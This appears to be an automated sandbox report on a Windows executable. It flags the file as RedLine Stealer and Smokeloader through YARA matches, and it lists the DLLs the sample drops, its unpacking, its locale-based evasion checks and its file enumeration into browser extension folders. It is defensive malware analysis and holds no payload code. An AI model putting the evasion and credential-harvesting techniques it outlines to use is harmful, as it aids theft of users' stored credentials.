                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E31DAB
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E95D7A
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E5BC4C
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E1DEC2
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E69E8F
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_61E89E0E
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: String function: 004043B0 appears 315 times
                      Source: nss3[1].dll.0.drStatic PE information: No import functions for PE file found
                      Source: vcruntime140[1].dll.0.drStatic PE information: No import functions for PE file found
                      Source: nss3.dll.0.drStatic PE information: No import functions for PE file found
                      Source: vcruntime140.dll.0.drStatic PE information: No import functions for PE file found
                      Source: nss3[1].dll.0.drStatic PE information: Data appended to the last section found
                      Source: vcruntime140[1].dll.0.drStatic PE information: Data appended to the last section found
                      Source: nss3.dll.0.drStatic PE information: Data appended to the last section found
                      Source: vcruntime140.dll.0.drStatic PE information: Data appended to the last section found
                      Source: FFAk2gixx5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/18@1/1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to behavior
                      Source: FFAk2gixx5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: FFAk2gixx5.exe, 00000000.00000003.2673898862.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000003.2685397085.00000000231C8000.00000004.00000020.00020000.00000000.sdmp, JECBGCFHCFIDHIDHDGDG.0.dr, CGDGHCBGDHJJKECAECBA.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: FFAk2gixx5.exeReversingLabs: Detection: 71%
                      Source: FFAk2gixx5.exeVirustotal: Detection: 68%
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                      Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeUnpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeUnpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: nss3[1].dll.0.drStatic PE information: real checksum: 0x202d6c should be: 0x1c592b
                      Source: vcruntime140[1].dll.0.drStatic PE information: real checksum: 0x16dd4 should be: 0x14d5a
                      Source: nss3.dll.0.drStatic PE information: real checksum: 0x202d6c should be: 0x1c592b
                      Source: vcruntime140.dll.0.drStatic PE information: real checksum: 0x16dd4 should be: 0x14d5a
                      Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004176B5 push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C373CF push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C373D7 push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C373A7 push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C37377 push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C3711F push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C374EF push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C374F7 push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C37497 push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C374BF push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C3745F push eax; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C37507 push edx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C3751F push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C37527 push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02C3753F push edx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD791C push ecx; ret
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00401120 GetSystemInfo,ExitProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
